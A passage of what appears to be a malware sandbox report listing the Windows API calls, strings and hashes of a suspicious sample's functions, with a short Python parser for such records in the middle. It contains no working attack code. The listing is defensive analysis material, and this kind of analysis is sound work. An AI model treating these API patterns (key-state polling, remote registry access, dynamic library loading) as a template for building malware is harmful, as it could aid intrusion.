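• Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
Similarity
• API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
• String ID:
• API String ID: 3113390036-3916222277
• Opcode ID: fc5ac0c1a8ba98fa6a5e95347320a59608e98ea6da0c131d2e1ea7b9d44b611a
• Instruction ID: c85c9df2790bfaa4c4d43b59008ceccf86403a1caf3d09448c5f5f5d37a969a2
• Opcode Fuzzy Hash: fc5ac0c1a8ba98fa6a5e95347320a59608e98ea6da0c131d2e1ea7b9d44b611a
• Instruction Fuzzy Hash: EA2180B150020CBFEB119BA4DD85FBB77EDEB88784F10412AF605A6240DA649D0657A1
APIs
• CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 009FD7C5
  • Part of subcall function 0098784B: _memmove.LIBCMT ref: 00987899
Strings
Memory Dump Source
• Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
Similarity
• API ID: BuffCharLower_memmove
• String ID: cdecl$none$stdcall$winapi
• API String ID: 3425801089-567219261
• Opcode ID: fb0d623fb39ca6d4ee291c1ec2331729afec02494bed2fe2da5125152a798023
• Instruction ID: c73b3e5d25b31936aaf263e96b28a03f91025524edca8e3b79c3a6b461f5fc70
• Opcode Fuzzy Hash: fb0d623fb39ca6d4ee291c1ec2331729afec02494bed2fe2da5125152a798023
• Instruction Fuzzy Hash: FD319C71904619ABCF00EF94C851ABEB7B9FF85324F108A29E825A77D1DB71AD05CB80
"""

# One API line: optional "Part of subcall function <addr>: " prefix, then
# Name.MODULE, optional "(args)," (LIBCMT lines carry no argument list), then ref.
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-F]+): )?"
    r"(?P<name>\w+)\.(?P<mod>\w+)(?:\((?P<args>.*)\),)? ref: (?P<ref>[0-9A-F]+)$"
)
SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}


@dataclass
class ApiCall:
    name: str
    module: str
    args: tuple
    ref: str
    subcall_of: Optional[str]  # address of the called subroutine, None for a direct call


@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)
    fields: dict = field(default_factory=dict)  # "API ID", "String ID", "Opcode ID", ...

    def direct_modules(self):
        """Modules imported by the function's own code (subcall lines excluded)."""
        return {c.module for c in self.apis if c.subcall_of is None}

    def strings(self):
        """The '$'-joined String ID split back into its individual strings."""
        return [s for s in self.fields.get("String ID", "").split("$") if s]

    def is_consistent(self):
        """Opcode Fuzzy Hash repeats Opcode ID, and API String ID is two
        decimal hashes '<API ID hash>-<String ID hash>' (as on this page)."""
        f = self.fields
        a, _, b = f.get("API String ID", "").partition("-")
        return f.get("Opcode ID") == f.get("Opcode Fuzzy Hash") and a.isdigit() and b.isdigit()


def parse_records(text):
    """Split the listing into FunctionRecords; every record starts at an 'APIs' header."""
    records, section = [], None
    for raw in text.splitlines():
        line = raw.strip().lstrip("• ").strip()
        if not line:
            continue
        if line in SECTIONS:
            section = line
            if line == "APIs":
                records.append(FunctionRecord())
            continue
        if not records:
            continue  # text before the first record
        if section == "APIs":
            m = API_RE.match(line)
            if m:
                args = tuple(m["args"].split(",")) if m["args"] is not None else ()
                records[-1].apis.append(ApiCall(m["name"], m["mod"], args, m["ref"], m["sub"]))
        else:
            key, _, value = line.partition(":")
            records[-1].fields[key.strip()] = value.strip()
    return records


def find_by_module(records, module):
    """Records whose own code (not a subcall) imports from `module`, e.g. 'WININET'."""
    return [r for r in records if module in r.direct_modules()]


if __name__ == "__main__":
    for rec in find_by_module(parse_records(SAMPLE), "WININET"):
        print(rec.fields["Opcode ID"], [c.name for c in rec.apis if c.subcall_of is None])
```

Subcall lines are kept but flagged, since an import seen only through a shared helper (the KERNEL32 calls under the WinINet function above) says less about the function's own purpose than a direct import does; `find_by_module` therefore matches on direct calls only.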
                                                                              APIs
                                                                              • GetStdHandle.KERNEL32(000000F6), ref: 009E6E89
                                                                              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 009E6EBB
                                                                              • GetStdHandle.KERNEL32(000000F6), ref: 009E6ECC
                                                                              • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 009E6F06
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                               • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: CreateHandle$FilePipe
                                                                              • String ID: nul
                                                                              • API String ID: 4209266947-2873401336
                                                                              • Opcode ID: 6f30856b085fefc4ed11f3b9cbb992445895e519084bd78176e1fc19afb5190e
                                                                              • Instruction ID: 09580661c12325a274a7b568bf0991a2b815b02eef6b405a066b015fa8ca7fbf
                                                                              • Instruction Fuzzy Hash: F621B0795003459BDB219F6ACC04AAA77A8AF657A0F200A5DF9E0E32D0D770AC618B10
                                                                              APIs
                                                                              • SetErrorMode.KERNEL32(00000001), ref: 009EAC54
                                                                              • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 009EACA8
                                                                              • __swprintf.LIBCMT ref: 009EACC1
                                                                              • SetErrorMode.KERNEL32(00000000,00000001,00000000,00A0F910), ref: 009EACFF
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                               • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorMode$InformationVolume__swprintf
                                                                              • String ID: %lu
                                                                              • API String ID: 3164766367-685833217
                                                                              • Opcode ID: db178a3207cc94c3aca21131b9ace61da6d2109adc9f5462e082b0db489066d0
                                                                              • Instruction ID: be15e1e7575cc4b8ba341c0373dbb495d5a068359c21d3e922596e1f35355941
                                                                              • Instruction Fuzzy Hash: C7219030A00109AFCB10EF65C945EAE7BB8FF89314B004469F909AB351DA31EA41CB61
                                                                              APIs
                                                                              • CharUpperBuffW.USER32(?,?), ref: 009E1B19
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                               • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: BuffCharUpper
                                                                              • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                              • API String ID: 3964851224-769500911
                                                                              • Opcode ID: d00b002e45c459ac9d9f2dca1d203333bd89b39ba2443d9092cc3804f83dcf41
                                                                              • Instruction ID: b21fd671cd0877a32b44e9d2bd4bf36fe72a1009e0431fdabd5d2bfa53db61d9
                                                                              • Instruction Fuzzy Hash: 6B1184319002588FCF00EF94D8559FEB7B4FFA6708F584465E815A7696EB329D06CB50
                                                                              APIs
                                                                              • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 009FEC07
                                                                              • GetProcessIoCounters.KERNEL32(00000000,?), ref: 009FEC37
                                                                              • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 009FED6A
                                                                              • CloseHandle.KERNEL32(?), ref: 009FEDEB
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                               • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                              • String ID:
                                                                              • API String ID: 2364364464-0
                                                                              • Opcode ID: 47f0202fb47e1ddcae1fb27c4a8430e3771e282e0b1c76232cbd5d8518bf4f09
                                                                              • Instruction ID: 8bed5c5f6bc41f86863370c1649b69958d2698a041c5a35fcfb73a1477b6d01c
                                                                              • Instruction Fuzzy Hash: F28150716003019FD760EF28C886F2AB7E5AF88714F54881DFA9A9B3D2DA70AC41CB51
                                                                              APIs
                                                                                • Part of subcall function 00987DE1: _memmove.LIBCMT ref: 00987E22
                                                                                • Part of subcall function 00A00E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,009FFDAD,?,?), ref: 00A00E31
                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A000FD
                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00A0013C
                                                                              • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00A00183
                                                                              • RegCloseKey.ADVAPI32(?,?), ref: 00A001AF
                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00A001BC
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                               • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                                              • String ID:
                                                                              • API String ID: 3440857362-0
                                                                              • Opcode ID: 16ef868a96004ef378f2447dad4faebe033977d9fab40a8f350f53923f33dcd4
                                                                              • Instruction ID: 3c2e52d1c6ad9c389223b63e91d09be456d2508fe7e859f368a398b5aa00c6b9
                                                                              • Instruction Fuzzy Hash: 12519D71208208AFC714EF68DC81F6AB7E8FF84314F44892DF595972A2DB31E905CB52
                                                                              APIs
                                                                                • Part of subcall function 00989837: __itow.LIBCMT ref: 00989862
                                                                                • Part of subcall function 00989837: __swprintf.LIBCMT ref: 009898AC
                                                                              • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 009FD927
                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 009FD9AA
                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 009FD9C6
                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 009FDA07
                                                                              • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 009FDA21
                                                                                • Part of subcall function 00985A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,009E7896,?,?,00000000), ref: 00985A2C
                                                                                • Part of subcall function 00985A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,009E7896,?,?,00000000,?,?), ref: 00985A50
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                               • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                              • String ID:
                                                                              • API String ID: 327935632-0
                                                                              • Opcode ID: 202cb3d7f9ab519b6a0316ecb9544ce98a9167141e58526f252a8b73ebfe4be7
                                                                              • Instruction ID: 525c9a81259cbd4aaa4ffaff34fe1e204296f2f9fb35949ac227d3cea2815ff6
                                                                              • Instruction Fuzzy Hash: B1514935A01209DFCB00EFA8C484AADB7F9FF49324B15816AE955AB312D731ED46CF91
                                                                              APIs
                                                                              • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 009EE61F
                                                                              • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 009EE648
                                                                              • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 009EE687
                                                                                • Part of subcall function 00989837: __itow.LIBCMT ref: 00989862
                                                                                • Part of subcall function 00989837: __swprintf.LIBCMT ref: 009898AC
                                                                              • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 009EE6AC
                                                                              • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 009EE6B4
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                               • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                              • String ID:
                                                                              • API String ID: 1389676194-0
                                                                              • Opcode ID: 2a854fed5e54afee956925fbdfb2e10c7081c82b54fc70ed587d5932142f365a
                                                                              • Instruction ID: aaaaff77f84c7f01e7d5552137f661cf08057d9f4fb0f7b2361be85e6c9e3dd5
                                                                              • Instruction Fuzzy Hash: 6351FB35A00205DFCB11EF65C985AAEBBF5EF49314F1480A9E819AB361DB31ED11DF50
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                               • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: f5146fd71e5e492257d36b1cb1dd747e580dfbd827647fb9860c36810d79baf8
                                                                              • Instruction ID: 6a2c1571c925af613a66451e22a9bbe1a69c4d981991ae40ea6a27923592d1dd
                                                                              • Instruction Fuzzy Hash: 1F41A535A0431CAFD720DF78EC48FA9BBB4EB29310F154265F916A72E1C770AD42DA51
                                                                              APIs
                                                                              • GetCursorPos.USER32(?), ref: 00982357
                                                                              • ScreenToClient.USER32(00A457B0,?), ref: 00982374
                                                                              • GetAsyncKeyState.USER32(00000001), ref: 00982399
                                                                              • GetAsyncKeyState.USER32(00000002), ref: 009823A7
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                               • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: AsyncState$ClientCursorScreen
                                                                              • String ID:
                                                                              • API String ID: 4210589936-0
                                                                              • Opcode ID: 4d58231b8a3ab56ea64c377db66de631eed83474d52e36203b9dc0a3314b3914
                                                                              • Instruction ID: 915458f2b5ab6f1b1f27e06cfe1cce4e28a58cc6342a54286566f8dae1fefd2b
                                                                              • Instruction Fuzzy Hash: 37417175604109FFCF25AF68CD44AE9BB79FB05764F20431AF829A6290C734A950DB91
                                                                              APIs
                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 009D63E7
                                                                              • TranslateAcceleratorW.USER32(?,?,?), ref: 009D6433
                                                                              • TranslateMessage.USER32(?), ref: 009D645C
                                                                              • DispatchMessageW.USER32(?), ref: 009D6466
                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 009D6475
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                               • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                                              • String ID:
                                                                              • API String ID: 2108273632-0
                                                                              • Opcode ID: 9c14a00ddbc9abd31e88ab65ec2a7ade73e7ab218e0bd82ed876c2a22bb610da
                                                                              • Instruction ID: 43633bd8dcd8639b9d9ad6cf5d2a92c9c2a5421ea65d54bee52d716ce5084c35
                                                                              • Opcode Fuzzy Hash: 9c14a00ddbc9abd31e88ab65ec2a7ade73e7ab218e0bd82ed876c2a22bb610da
                                                                              • Instruction Fuzzy Hash: 0931C6359806469FDB64CFF4CC44BF6BBACAB42310F14857BE421C32B1E76A944ADB50
                                                                              APIs
                                                                              • GetWindowRect.USER32(?,?), ref: 009D8A30
                                                                              • PostMessageW.USER32(?,00000201,00000001), ref: 009D8ADA
                                                                              • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 009D8AE2
                                                                              • PostMessageW.USER32(?,00000202,00000000), ref: 009D8AF0
                                                                              • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 009D8AF8
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: MessagePostSleep$RectWindow
                                                                              • String ID:
                                                                              • API String ID: 3382505437-0
                                                                              • Opcode ID: abc0af0fbc1b7b958abff969241a842b1b2ba042626b0031e2c66d18faadeff2
                                                                              • Instruction ID: c29c8316563781abb0b0326f06f0e94ebaba7a037629138f75947f732cc393b9
                                                                              • Opcode Fuzzy Hash: abc0af0fbc1b7b958abff969241a842b1b2ba042626b0031e2c66d18faadeff2
                                                                              • Instruction Fuzzy Hash: 7D31CE71500219EFDF14CFA8D94CA9F3BB9EB04315F10862AF925EB2D2CBB49915DB90
                                                                              APIs
                                                                              • IsWindowVisible.USER32(?), ref: 009DB204
                                                                              • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 009DB221
                                                                              • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 009DB259
                                                                              • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 009DB27F
                                                                              • _wcsstr.LIBCMT ref: 009DB289
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                              • String ID:
                                                                              • API String ID: 3902887630-0
                                                                              • Opcode ID: 75c120b6a8b48df09c6686e83a3635333f72fe11ea0ed6670ca2ef306de0a8eb
                                                                              • Instruction ID: dc4d9ae094c783153e805a878980a17a20454cbb69ec74a7f3267932db552aa0
                                                                              • Opcode Fuzzy Hash: 75c120b6a8b48df09c6686e83a3635333f72fe11ea0ed6670ca2ef306de0a8eb
                                                                              • Instruction Fuzzy Hash: 55213A33644204BBEB259B759C49F7F7B9CDF9A710F01813AF904DA251EF61DC4192A0
                                                                              APIs
                                                                                • Part of subcall function 00982612: GetWindowLongW.USER32(?,000000EB), ref: 00982623
                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00A0B192
                                                                              • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00A0B1B7
                                                                              • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00A0B1CF
                                                                              • GetSystemMetrics.USER32(00000004), ref: 00A0B1F8
                                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,009F0E90,00000000), ref: 00A0B216
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Long$MetricsSystem
                                                                              • String ID:
                                                                              • API String ID: 2294984445-0
                                                                              • Opcode ID: 0eb96a8fb6e7cbb167db5171dcc3be37c6a2fa93671204e39f712c285fc7e63c
                                                                              • Instruction ID: d27f071caefd450ece9e6df4c05c9fee85c04b4f368ba6d0bef225b52dd7b6a4
                                                                              • Opcode Fuzzy Hash: 0eb96a8fb6e7cbb167db5171dcc3be37c6a2fa93671204e39f712c285fc7e63c
                                                                              • Instruction Fuzzy Hash: 2B21A371920259AFCB209F78ED14A6A37A4FB09721F104738FD32D71E1E7309852DBA0
                                                                              APIs
                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 009D9320
                                                                                • Part of subcall function 00987BCC: _memmove.LIBCMT ref: 00987C06
                                                                              • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 009D9352
                                                                              • __itow.LIBCMT ref: 009D936A
                                                                              • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 009D9392
                                                                              • __itow.LIBCMT ref: 009D93A3
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$__itow$_memmove
                                                                              • String ID:
                                                                              • API String ID: 2983881199-0
                                                                              • Opcode ID: d89663649f5cb8b2f30a85040724bbbf6dbd6179668d1a15b61195c73a1869c4
                                                                              • Instruction ID: fcfa39ca632d1c027c5f3fa8cce9c016beddcf5e3c276aeb8615cf6a3dd55786
                                                                              • Opcode Fuzzy Hash: d89663649f5cb8b2f30a85040724bbbf6dbd6179668d1a15b61195c73a1869c4
                                                                              • Instruction Fuzzy Hash: 6F21D731740208BFDB20BAA48C85FAEFBADEB89710F148026F945E73D1D6B0CD429791
                                                                              APIs
                                                                              • IsWindow.USER32(00000000), ref: 009F5A6E
                                                                              • GetForegroundWindow.USER32 ref: 009F5A85
                                                                              • GetDC.USER32(00000000), ref: 009F5AC1
                                                                              • GetPixel.GDI32(00000000,?,00000003), ref: 009F5ACD
                                                                              • ReleaseDC.USER32(00000000,00000003), ref: 009F5B08
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
